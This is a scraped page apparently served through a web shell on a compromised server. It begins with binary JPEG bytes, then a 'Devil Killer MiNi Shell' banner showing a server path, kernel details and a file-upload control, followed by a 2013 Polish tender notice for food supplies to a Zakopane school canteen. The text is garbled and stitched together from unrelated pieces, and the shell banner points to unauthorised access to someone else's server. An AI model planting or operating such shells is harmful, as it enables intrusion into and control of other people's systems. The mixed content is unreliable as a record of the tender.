JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131128/255419-N-2013.html

<p class="kh_header"><b>Zakopane: Dostawy artykułów spożywczych na potrzeby stołówki internatu Zakopiańskiego Centrum Edukacji.</b><br>
<b>Numer ogłoszenia: 255419 - 2013; data zamieszczenia: 28.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakopiańskie Centrum Edukacji im. H. Modrzejewskiej , ul. Kasprusie 35A, 34-500 Zakopane, woj. małopolskie, tel. 018 2012786, faks 018 2012786.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zce.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych na potrzeby stołówki internatu Zakopiańskiego Centrum Edukacji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  są sukcesywne dostawy artykułów spożywczych na potrzeby stołówki Zakopiańskiego Centrum Edukacji, zgodnie z warunkami wynikającymi z obowiązujących przepisów, w szczególności ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. nr 171, poz. 1225).
Szczegółowy opis przedmiotu zamówienia określony jest w załączniku nr 2 do niniejszej specyfikacji i jest podzielony na 5 pakietów tj.
I -  Mięso i  wędliny
II-  Artykuły nabiałowe
III- Artykuły sypkie, przyprawy i przetwory
IV- Owoce, warzywa, mrożonki, ryby i jajka
V  - Pieczywo.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.22.10.00-3, 03.14.25.00-3, 03.22.00.00-9, 15.51.00.00-6, 15.54.40.00-3, 15.53.00.00-2, 15.55.10.00-5, 15.89.60.00-5, 15.81.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.

Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.
.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.

Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.

Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.

Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu.

Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ma do oferty załączyć wypełniony załącznik nr 2 do siwz- ceny jednostkowe.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy
       w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w 
       zakresie : cena jednostkowa danego produktu może ulec zmianie w przypadku ustawowej 
       stawki od towarów i usług VAT, przy czym zmianie ulegnie wyłącznie cena jednostkowa 
       brutto, ceny jednostkowe netto pozostaną bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zce.zakopane.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakopiańskie Centrum Edukacji
ul. Małe Żywczańskie 9b
34-500 Zakopane
Tel./fax: 18/20 127 82.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2013 godzina 09:30, miejsce: Oferty należy składać w w siedzibie głównej      Zakopiańskiego Centrum Edukacji, ul. Kasprusie 35 a, Zakopane - pokój 107.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 01 <b>NAZWA:</b> Dostawy mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kości karkowe	30	kg
2.	Mięso gulasz cielęcy	20	kg
3.	Mięso schab wieprzowyb/kości	500	kg
4.      	Mięso pieczeń cielęca	30	kg
5.	Mięso pieczeń wołowa	20	kg
6.	Mięso łopatka wieprzowab/kości	600	kg
7.	Mięso wołowe - rostbef	20	kg
8.	Filet z kurczaka	550	kg
9.	Udko z kurczaka	400	kg
10.	Kurczak	30	kg
11.	Porcje rosołowe	500	kg
12	Filet z indyka	400	kg
13.	Słonina	15	kg
14.	Filet pieczony z indyka	15	kg
15.	Golonka prasowana	10	kg
16.	Kiełbasa zwyczajna	60	kg
17.	Kiełbasa krakowska parzona	20	kg
18.	Kiełbasa krakowska sucha	50	kg
19.	Kiełbasa szynkowa	40	kg
20.	Kiełbasa toruńska	80	kg
21.	Kiełbasa wiejska	10	kg
22.	Szynka wołowa z niską zawartością tłuszczu	10	kg
23.	Szynka drobiowa z niską zawartością tłuszczu	20	kg
24.	Szynka wieprzowa z niską zawartością	10	kg
25.	Kiełbasa wieprzowa z niską zawartością tłuszczu	10	kg
26.	Parówki drobiowe z niską zawartością tłuszczu	20	kg
27.	Parówki śląskie	50	kg
28.	Frankfuterki	100	kg
29.	Polędwica z indyka	80	kg
30.	Polędwica  sopocka	80	kg
31.	Kiełbasa lisiecka	10	kg
32.	Pasztet drobiowy 50 g	1000	szt.
33.	Podgardle wędzone	50	kg
34.	Pasztet domowy	30	kg
35.	Pasztetowa kremowa	15	kg
36.	Szynka gotowana	50	kg
37.	Indyk w galarecie z warzywami	20	kg
38.	Szynka łopatkowa	20	kg
39.	Szynka staropolska	30	kg
40.	Szynka wieprzowa	20	kg
41.	Szynka delikatesowa	10	kg
42.	Szynka konserwowa	40	kg
43.	Wątroba wieprzowa	20	kg
44..	Mięso karczek b/kości	50	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.11.30-5, 15.11.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 02 <b>NAZWA:</b> Dostawa artykułów nabiałowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Jogurt owocowy 125 g	1000	szt.
2.	Jogurt naturalny niskotłuszczowy 150 g	100	szt.
3.	Jogurt naturalny niskotłuszczowy 200 g	100	szt.
4.	Jogurt naturalny niskotłuszczowy250 g	100	szt.
5.	Jogurt owocowy light 200 g	100	szt.
6.	Kefir 5 kg	20	szt.
7.	Kefir 400 ml	400	szt.
8.	Mleko karton 1 l  3,2%	1500	szt.
9.	Mleko karton 1 l  1.5%	100	szt.
10.	Śmietana 18% 400 g	800	szt.
11.	Śmietana 12% 200 g	50	szt.
12.	Śmietanka 18% 250 ml	100	szt.
13.	Margaryna mleczna 250 g	150	szt.
14.	Masło 200 g	1000	szt.
15.	Masło śmietankowe 200 g	100	szt.
16.	Masło jogurtowe 200 g	100	szt.
17.	Serek typu Tartare 20 g	4000	szt.
18.	Serek typu Twój smak 125 g	400	szt.
19.	Serek typu Kiri 100 g	200	szt.
20.	Ser topiony plastry 140 g	50	szt.
21.	Serek homogenizowany typu Darek 135 g	800	szt.
22.	Ser topiony light najmniejsza zawartość tłuszczu 150 g	20	szt.
23.	Serek  typu Wiejski 150 g	200	szt.
24.	Ser twarogowy półtłusty	200	kg
25.	Ser twarogowy chudy	30	kg
26.	Ser topiony kostka 100 g	50	szt.
27.	Bryndza 120 g	50	szt.
28.	Serek typu Kanapkowy 150 g	100	szt.
29.	Serek typu Fromage 100 g	300	szt.
30.	Ser topiony krążki 150 g	200	szt.
31	Ser  typu Feta 12% 270g	30	szt.
32.	Ser żółty typu Salami	150	kg
33.	Ser żółty typu Edamski	50	kg
34.	Ser żółty typu Gouda	50	kg
35.	Ser żółty typu Dziurawiec	50	kg
36.	Ser żółty typu Podlaski	10	kg
37.	Ser żółty typu Wiejski wędzony	10	kg
38.	Ser żółty typu Ementaler kg	15	kg
39.	Ser żółty z niską zawartością                tłuszczu  - do 35%	20	kg
40.	Mleko karton 1l odtłuszczone0% tłuszczu	100	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-6, 15.54.40.00-3, 15.53.00.00-2, 15.53.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 03 <b>NAZWA:</b> Dostawa artykułów sypkich, przypraw i przetworów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ananas w syropie  565 g	20	szt.
2.	Bazylia 10 g	10	szt.
3.	Barszcz czerwony -koncentrat 250 ml 	30	szt.
4.	Chrzan tarty typu Polonaise 180 g	30	szt.
5.	Cukier kryształ	800	kg
6.	Cukier puder	20	kg
7.	Cukier waniliowy 30 g	40	szt.
8.	Cynamon 20 g	20	szt.
9.	Czosnek granulowany 1000 g	25	szt.
10.	Dżem porcjowany 25 g mix(typu Tymbark)	7000	szt.
11.	Dżem wiadro - truskawka  7,2 kg	5	szt.
12.	Galaretka owocowa 79 g	100	szt.
13.	Groszek konserw.(typu Pudliszki) 400 g	30	szt.
14.	Grzyby- pieczarki marynowane 0,8 l	20	szt.
15.	Herbata indyjska 80 g	200	szt.
16.	Herbata ekspresowa(typu Golden assam) 100 szt.	50	szt.
17.	Jabłko prażone 0,9 l 	50	szt.
18.	Kukurydza konserwowa (typu Pudliszki) 400 g	70	szt.
19.	Kasza jęczmienna mazurska 	30	kg
20.	Kakao (typu Decco moreno) 200 g	5	szt.
21.	Kawa  naturalna rozpuszczalna(typu Nescaffe clasic) 200g	50	szt.
22	Kwasek cytrynowy 20 g	100	szt.
23.	Ketchup łagodny (typu Roleski) 450 g	100	szt.
24.	Przyprawa do potraw (typu Kucharek) 1kg	100	szt.
25.	Kminek 30 g	10	szt.
26.	Koper suszony 20 g	10	szt.
27.	Koper solony 180 g	20	szt.
28.	Liść laurowy 125 g	20	szt.
29.	Mąka ziemniaczana	50	kg
30.	Mąka pszenna  poznańska	600	kg
31.	Makaron łazanki (typu Lubella)	50	kg
32.	Makaron gwiazdki(typu Lubella)	20	kg
33.	Makaron muszelki małe (typu Lubella)	50	kg
34.	Makaron spaghetti(typuLubella)	100	kg
35.	Makaron kolanka(typu Lubella)	50	kg
36.	Makaron nitki(typu Czarniecki) 	100	kg
37.	Makaron zacierka 250 g	150	szt.
38.	Musztarda(typu Roleski) 450 g	50	szt.
39.	Miód naturalny 15 g	1000	szt.
40.	Oregano 10 	15	szt.
41.	Ogórki konserwowe (typu Roleski)0,9 l	100	szt.
42.	Olej uniwersalny 5 l	150	szt.
43.	Ocet winny 225 ml	25	szt.
44.	Przecier pomidorowy 30% (typu Pudliszki) 0,2 l	100	szt.
45.	Przecier pomidorowy(typy Złoty bażant) 400 g	150	szt.
46.	Papryka konserwowa( typu Roleski) 0,9 l	20	szt.
47.	Płatki zbożowe(typu Choco cool ) 1000 g	60	szt.
48.	Płatki kukurydziane (typu Nestle) 1000 g	80	szt.
49.	Proszek do pieczenia 30 g	10	szt.
50.	Ryż biały (typu Sonko)	200	kg
51.	Sól	150	kg
52.	Napój owocowy(typu Tymbark) 0,2 l	200	szt.
53.	Sos  ogrodowy, sałatkowy (typu Knorr) 700 g	20	szt.
54.	Sos bolognase(typu Knorr) 1000 g	20	szt.
55.	Susz warzywny 100 g	70	szt.
56.	Wafelki w czekoladzie (typu Grześki) 36 g	500	szt.
57.	Wafelki w czekoladzie (typu Prince polo) 20 g	1000	szt.
58.	Pieprz naturalny czarny 500 g	15	szt.
59.	Ziele angielskie 400 g	10	szt.
60.	Żurek (typu Śląski) 0,5 l	50	szt.
61.	Ocet spirytusowy 10 %0,5 l	10	szt.
62.	Musli 1000 g	20	szt.
63.	Kisiel 38 g	50	szt.
64.	Kotlety sojowe 100 g	50	szt.
65.	Przyprawa do drobiu 500 g	10	szt.
66.	Papryka w proszku 1000g ostra  i łagodna	10	szt.
67.	Woda mineralna 0,5 l niegazowana	200	szt.
68.	Woda mineralna gazowana 0,5 l	200	szt.
69.	Woda mineralna 1,5 l niegazowana	200	szt.
70.	Woda mineralna gazowana 1,5 l	200	szt.
71.	Suszone morele 150 g	20	szt.
72.	Suszone sliwki(typu kalifornijskie) 150 g	20	szt.
73.	Orzechy włoskie łuskane	5	kg
74.	Soczewica 	10	kg
75.	Majonez (typu Roleski)   0,9 l	80	szt.
76.	Majeranek 15 g	40	szt.
77.	Tuńczyk w sosie własnym 170 g	20	szt.
78.	Maggi - przyprawa do potraw(typu  Winiary) 1 l  	100	szt.
79.	Oliwki 1 l	10	szt.
80.	Pestki dyni 100 g	20	szt.
81.	Herbata -owocowa mieszanka -saszetki 60 szt. 	10	szt.
82.	Kasza gryczana	20	kg
83.	Makaron z mąki durum	20	kg
84.	Zioła prowansalskie 10 g	10	szt.
85.	Tymianek 10 g	10	szt.
86.	Pieprz ziołowy 10 g	10	szt.
87.	Kawa parzona typu(Prima)500 gszt.	20	szt.
88.	Kawa rozpuszczalna typu (Prima) 200 g	20	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-5, 15.87.00.00-7, 15.41.11.00-3, 15.86.32.00-7, 15.86.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 04 <b>NAZWA:</b> Dostawa owoców, mrozonek, ryb i jajek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Brzoskwinie	200	kg					
2.	Banany	300	kg					
3.	Botwina	20	szt.					
4.	Buraki czerwone	400	kg					
5.	Cebula	200	kg					
6.	Cytryny	150	kg					
7.	Fasola Jaś średni	35	kg					
8.	Fasola szparagowa	30	kg					
9.	Fasola szparagowa mrożona	100	kg					
10.	Groch łuszczony	20	kg					
11.	Grzyby pieczarki	60	kg					
12.	Jabłka	500	kg					
13.	Jaja	4000	szt.					
14.	Kapusta biała	400	kg					
15.	Kapusta czerwona	50	kg					
16.	Kapusta włoska	100	szt.					
17.	Kapusta pekińska	200	szt.					
18.	Kapusta kiszona	200	kg					
19.	Kalafior	50	szt.					
20.	Kalafior mrożony	70	kg					
21.	Koper zielony	400	szt.					
22.	Marchew korzeniowa	700	kg					
23.	Mandarynki	150	kg					
24.	Mieszanka warzywna (bukiet z warzyw) 	200	kg					
25.	Marchew z groszkiem mrożona	40	kg					
26.	Mieszanka kompotowa mrożona	500	kg					
27.	Ogórki zielone	400	kg					
28.	Ogórki kiszone	200	kg					
29.	Pomidory	350	kg					
30.	Pory	40	szt.					
31.	Papryka czerwona	50	kg					
32.	Pietruszka zielona	400	szt.					
33.	Pietruszka korzeń	40	kg					
34.	Rzodkiewka	50	szt.					
35.	Ryba - filet mrożony z mintaja ( płaty)	350	kg					
36.	Seler korzeniowy	30	kg					
37.	Sałata zielona	700	szt.					
38.	Szczypiorek	100	szt.					
39.	Ziemniaki	6000	kg					
40.	Truskawki mrożone	100	kg					
41.	Arbuz	100	kg					
42.	Borówka 	30	kg					
43.	Truskawka 	50	kg					
44.	Maliny	30	kg					
45.	Porzeczki czarne	30	kg					
46.	Nektarynki	100	kg					
47.	Wiśnie	30	kg					
48.	Czereśnie	30	kg					
49.	Śliwki	30	kg					
50.	Cukinia	30	kg					
51.	Sałata lodowa	100	szt.					
52.	Pomarańcze	30	kg					
53.	Morele	30	kg					
54.	Fasolka czerwona	20	kg					
55.	Fasolka białamała	20	kg					
56.	Brokuły	50	szt.					
57.	Cebula czerwona	20	kg					
58.	Ryba filet mrożony tilapia(płaty)	50	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 03.14.25.00-3, 15.22.10.00-3, 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 05 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Bułka kajzerka 30 g	2000	szt.
2.	Bułka kajzerka 60 g	7000	szt.
3.	Bułka tarta	200	kg
4.	Chleb pszenno - żytni  krojony    700 g	2000	szt.
5.	Chleb graham krojony 500 g	100	szt.
6.	Drożdżówki 100 g	1000	szt.
7.	Pączki 100 g	300	szt.
8.	Ciasto drożdżowe	20	kg
9.	Chleb pełnoziarnisty 700 g	50	szt.
10.	Sernik	20	kg
11.	Chleb żytni pełnoziarnisty 700 g	50	szt.
12.	Bułka grahamka 60 g	300	szt.
13.	Chleb wieloziarnisty 700 g	50	szt.
14.	Bagietka 100 g	100	szt.
15.	Chleb razowy staropolski 700 g	40	szt.
16.	Chleb razowy z ziarnami 700 g	50	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
